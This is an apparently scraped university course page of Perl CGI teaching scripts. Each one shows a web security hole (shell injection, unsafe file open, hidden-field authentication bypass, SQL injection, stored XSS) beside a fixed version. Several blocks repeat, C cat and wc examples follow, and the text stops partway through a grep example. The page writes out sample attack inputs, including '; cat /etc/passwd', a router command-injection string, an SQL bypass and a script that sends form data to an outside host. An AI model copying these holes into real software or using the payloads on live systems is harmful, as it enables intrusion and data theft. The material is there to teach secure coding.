print header, start_html('Insecure Shell');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

$user_id =`/usr/bin/id $login`;
print "The user id of $login is $user_id\n", end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # removed all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

with CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with Shell special characters
# but it is safer to run mail directly rather via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# This stops quotes causing a shell syntax error 
$address =~ s/'/\\'/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;

to simulate the security hole present is some linksys routers

This security hole was exploited to allow the routers operating system to be user upgraded by entering a command like this: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to simulate the security hole present is some linksys routers with security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit user name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure $filename might contain |, > or < characters
# $filename also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///;
$filename =~ s/^\.*$//;
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate fixing a CGI security hole note login&password are passed as hidden fields by admin screen and authenticated again before changing a mark

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="1">
<input type="hidden" name="password" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate SQL injection

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=' or '42'='42

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>correct horse battery staple</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

with SQL injection security hole fixed

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=or 't'='t

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecesssary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;

to exhibit a cross site scripting attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users which is a security hole because it allows cross-site scripting attack .

A use can upload HTML and then it will be embedded in a web page viewed by other users.

This is a security hole, because they can for example, upload javascript which changes the page, for example, redirecting URLs

For example if they could upload this Javascript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


to exhibit avoiding a cross site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    $user_status =~ s/</&lt;/g
    $user_status =~ s/>/&gt;/g
    $user_status =~ s/&/&amp;/g
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;

Week 11  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday oct 11 lecture topics:CGI

Friday oct 13 lecture topics:Git


to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # removed all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

with CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with Shell special characters
# but it is safer to run mail directly rather via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# This stops quotes causing a shell syntax error 
$address =~ s/'/\\'/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;

with CGI security hole fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('A Simple Example');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# Remove all but characters legal in e-mail addresses
# and reduce to maximum allowed length
$address = substr($address, 0, 256);
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;

open F, '|-', 'mutt', '-e', 'set copy=no', '-s', 'web message', '--', $address or die "Can not run mail";
print F "Hello\n";
close F;
print "Mail sent to $address\n", end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure $filename might contain |, > or < characters
# $filename also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///;
$filename =~ s/^\.*$//;
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate fixing a CGI security hole note login&password are passed as hidden fields by admin screen and authenticated again before changing a mark

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="1">
<input type="hidden" name="password" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

$token = param('token');
if (defined $token) {
	$token =~ s/[^\w\-]//g;
	$token_file = "issued_tokens/$token";
	# check we've issued token in the last day
	if (length($token) > 30 && -e $token_file && -M $token_file < 1) {
	    if (param('student_number') && param('new_mark')) {
	        mark_changed_screen();
	    } else {
	        change_mark_screen()
	    }
	} else {
	    login_screen();
	}
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
    	# get a unique 64-bit UUID
		$token = `uuidgen`;
		chomp $token;
		$token_file = "issued_tokens/$token";
		open F, '>', "$token_file";
		close F;
        param('token', $token);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n", p;
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="token" value="$token">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to simulate the security hole present is some linksys routers

This security hole was exploited to allow the routers operating system to be user upgraded by entering a command like this: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to simulate the security hole present is some linksys routers with security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit user name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to demonstrate SQL injection

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=' or '42'='42

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>correct horse battery staple</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

with SQL injection security hole fixed

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=or 't'='t

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecesssary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;

to exhibit a cross site scripting attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users which is a security hole because it allows cross-site scripting attack .

A use can upload HTML and then it will be embedded in a web page viewed by other users.

This is a security hole, because they can for example, upload javascript which changes the page, for example, redirecting URLs

For example if they could upload this Javascript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


to exhibit avoiding a cross site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    $user_status =~ s/</&lt;/g
    $user_status =~ s/>/&gt;/g
    $user_status =~ s/&/&amp;/g
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;

Week 12  Tutorial: Questions & Sample Answers  Laboratory: Exercises

Friday oct 20 lecture topics:Exam

Week 13  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions


COMP[29]041 Topic-by-Topic

Intro:lecture slideslecture notes
External resources: Stack Overflow - Q&A for programmers

Filters:lecture slideslecture notes Command Line Examples
External resources: regex1011: online regex tester


Simple /bin/cat emulation.

#include <stdio.h>
#include <stdlib.h>

// write bytes of stream to stdout
void process_stream(FILE *in) {
    while (1) {
        int ch = fgetc(in);
        if (ch == EOF)
             break;
        if (fputc(ch, stdout) == EOF) {
            fprintf(stderr, "cat:");
            perror("");
            exit(1);
        }
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1)
        process_stream(stdin);
    else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            fclose(in);
        }
    return 0;
}

Simple /usr/bin/wc emulation.

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

// count lines, words, chars in stream
void process_stream(FILE *in) {
    int n_lines = 0, n_words = 0, n_chars = 0;
    int in_word = 0, c;
    while ((c = fgetc(in)) != EOF) {
        n_chars++;
        if (c == '\n')
            n_lines++;
        if (isspace(c))
            in_word = 0;
        else if (!in_word) {
            in_word = 1;
            n_words++;
        }
    }
    printf("%6d %6d %6d", n_lines, n_words, n_chars);
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1)
        process_stream(stdin);
    else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            printf(" %s\n", argv[i]);
            fclose(in);
        }
    return 0;
}

Over-simple /usr/bin/grep emulation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

